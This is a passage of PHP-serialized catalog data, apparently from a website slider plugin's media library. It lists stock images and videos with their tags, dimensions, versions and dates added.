14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:288;a:12:{s:2:\"id\";s:3:\"109\";s:6:\"handle\";s:13:\"sky_night.jpg\";s:4:\"name\";s:9:\"Sky Night\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:289;a:12:{s:2:\"id\";s:3:\"108\";s:6:\"handle\";s:15:\"palm_sunset.jpg\";s:4:\"name\";s:11:\"Palm Sunset\";s:4:\"tags\";a:4:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:3;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1372\";s:6:\"height\";s:4:\"1920\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:290;a:12:{s:2:\"id\";s:3:\"107\";s:6:\"handle\";s:18:\"concert_people.jpg\";s:4:\"name\";s:14:\"Concert People\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:291;a:12:{s:2:\"id\";s:3:\"106\";s:6:\"handle\";s:15:\"forest_road.jpg\";s:4:\"name\";s:11:\"Forest Road\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:292;a:12:{s:2:\"id\";s:3:\"105\";s:6:\"handle\";s:15:\"beach_ocean.jpg\";s:4:\"name\";s:11:\"Beach Ocean\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:2;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:293;a:12:{s:2:\"id\";s:3:\"104\";s:6:\"handle\";s:18:\"mountain_night.jpg\";s:4:\"name\";s:14:\"Mountain Night\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:294;a:12:{s:2:\"id\";s:3:\"103\";s:6:\"handle\";s:19:\"ocean_mountains.jpg\";s:4:\"name\";s:15:\"Ocean Mountains\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:295;a:12:{s:2:\"id\";s:3:\"102\";s:6:\"handle\";s:10:\"forest.jpg\";s:4:\"name\";s:6:\"Forest\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:296;a:12:{s:2:\"id\";s:3:\"101\";s:6:\"handle\";s:16:\"ocean_stones.jpg\";s:4:\"name\";s:12:\"Ocean Stones\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:2;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:297;a:12:{s:2:\"id\";s:3:\"100\";s:6:\"handle\";s:16:\"country_road.jpg\";s:4:\"name\";s:12:\"Country Road\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:298;a:12:{s:2:\"id\";s:2:\"99\";s:6:\"handle\";s:9:\"beach.jpg\";s:4:\"name\";s:5:\"Beach\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:299;a:12:{s:2:\"id\";s:2:\"98\";s:6:\"handle\";s:16:\"city_skyline.jpg\";s:4:\"name\";s:12:\"City Skyline\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:300;a:12:{s:2:\"id\";s:2:\"97\";s:6:\"handle\";s:17:\"night_skyline.jpg\";s:4:\"name\";s:13:\"Night Skyline\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:2;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:301;a:12:{s:2:\"id\";s:2:\"96\";s:6:\"handle\";s:14:\"city_river.jpg\";s:4:\"name\";s:10:\"City River\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:302;a:12:{s:2:\"id\";s:2:\"95\";s:6:\"handle\";s:19:\"mountain_view_3.jpg\";s:4:\"name\";s:15:\"Mountain View 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:303;a:12:{s:2:\"id\";s:2:\"94\";s:6:\"handle\";s:14:\"misty_farm.jpg\";s:4:\"name\";s:10:\"Misty Farm\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:304;a:12:{s:2:\"id\";s:2:\"93\";s:6:\"handle\";s:17:\"mountain_path.jpg\";s:4:\"name\";s:13:\"Mountain Path\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:305;a:12:{s:2:\"id\";s:2:\"92\";s:6:\"handle\";s:19:\"night_skyline_3.jpg\";s:4:\"name\";s:15:\"Night Skyline 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:306;a:12:{s:2:\"id\";s:2:\"91\";s:6:\"handle\";s:17:\"mountain_view.jpg\";s:4:\"name\";s:13:\"Mountain View\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1160\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:307;a:12:{s:2:\"id\";s:2:\"90\";s:6:\"handle\";s:19:\"rocky_landscape.jpg\";s:4:\"name\";s:15:\"Rocky Landscape\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:308;a:12:{s:2:\"id\";s:2:\"89\";s:6:\"handle\";s:19:\"mountain_view_4.jpg\";s:4:\"name\";s:15:\"Mountain View 4\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1203\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:309;a:13:{s:2:\"id\";s:3:\"529\";s:6:\"handle\";s:13:\"Fitness-4.jpg\";s:5:\"video\";s:13:\"Fitness-4.mp4\";s:4:\"name\";s:10:\"Fitness 4 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:310;a:13:{s:2:\"id\";s:3:\"528\";s:6:\"handle\";s:13:\"Fitness-3.jpg\";s:5:\"video\";s:13:\"Fitness-3.mp4\";s:4:\"name\";s:10:\"Fitness 3 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:311;a:13:{s:2:\"id\";s:3:\"527\";s:6:\"handle\";s:9:\"Chess.jpg\";s:5:\"video\";s:9:\"Chess.mp4\";s:4:\"name\";s:6:\"Chess \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:312;a:13:{s:2:\"id\";s:3:\"526\";s:6:\"handle\";s:13:\"Fitness-2.jpg\";s:5:\"video\";s:13:\"Fitness-2.mp4\";s:4:\"name\";s:10:\"Fitness 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:313;a:13:{s:2:\"id\";s:3:\"525\";s:6:\"handle\";s:11:\"Fitness.jpg\";s:5:\"video\";s:11:\"Fitness.mp4\";s:4:\"name\";s:8:\"Fitness \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:314;a:13:{s:2:\"id\";s:3:\"524\";s:6:\"handle\";s:9:\"Earth.jpg\";s:5:\"video\";s:9:\"Earth.mp4\";s:4:\"name\";s:6:\"Earth \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:315;a:13:{s:2:\"id\";s:3:\"523\";s:6:\"handle\";s:11:\"Space-2.jpg\";s:5:\"video\";s:11:\"Space-2.mp4\";s:4:\"name\";s:8:\"Space 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1440\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:316;a:13:{s:2:\"id\";s:3:\"522\";s:6:\"handle\";s:13:\"Asteroids.jpg\";s:5:\"video\";s:13:\"Asteroids.mp4\";s:4:\"name\";s:10:\"Asteroids \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:317;a:13:{s:2:\"id\";s:3:\"521\";s:6:\"handle\";s:9:\"Space.jpg\";s:5:\"video\";s:9:\"Space.mp4\";s:4:\"name\";s:6:\"Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:318;a:13:{s:2:\"id\";s:3:\"520\";s:6:\"handle\";s:10:\"People.jpg\";s:5:\"video\";s:10:\"People.mp4\";s:4:\"name\";s:7:\"People \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:319;a:13:{s:2:\"id\";s:3:\"519\";s:6:\"handle\";s:11:\"Walking.jpg\";s:5:\"video\";s:11:\"Walking.mp4\";s:4:\"name\";s:8:\"Walking \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:320;a:13:{s:2:\"id\";s:3:\"518\";s:6:\"handle\";s:19:\"Double-Exposure.jpg\";s:5:\"video\";s:19:\"Double-Exposure.mp4\";s:4:\"name\";s:16:\"Double Exposure \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:321;a:13:{s:2:\"id\";s:3:\"517\";s:6:\"handle\";s:8:\"Girl.jpg\";s:5:\"video\";s:8:\"Girl.mp4\";s:4:\"name\";s:5:\"Girl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1088\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:322;a:13:{s:2:\"id\";s:3:\"516\";s:6:\"handle\";s:17:\"Bengal-Lights.jpg\";s:5:\"video\";s:17:\"Bengal-Lights.mp4\";s:4:\"name\";s:14:\"Bengal Lights \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:323;a:13:{s:2:\"id\";s:3:\"515\";s:6:\"handle\";s:13:\"Swiping-2.jpg\";s:5:\"video\";s:13:\"Swiping-2.mp4\";s:4:\"name\";s:10:\"Swiping 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:324;a:13:{s:2:\"id\";s:3:\"514\";s:6:\"handle\";s:11:\"Mock-Up.jpg\";s:5:\"video\";s:11:\"Mock-Up.mp4\";s:4:\"name\";s:8:\"Mock Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:325;a:13:{s:2:\"id\";s:3:\"513\";s:6:\"handle\";s:13:\"Countdown.jpg\";s:5:\"video\";s:13:\"Countdown.mp4\";s:4:\"name\";s:10:\"Countdown \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:326;a:13:{s:2:\"id\";s:3:\"512\";s:6:\"handle\";s:18:\"Wall-Sketching.jpg\";s:5:\"video\";s:18:\"Wall-Sketching.mp4\";s:4:\"name\";s:15:\"Wall Sketching \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 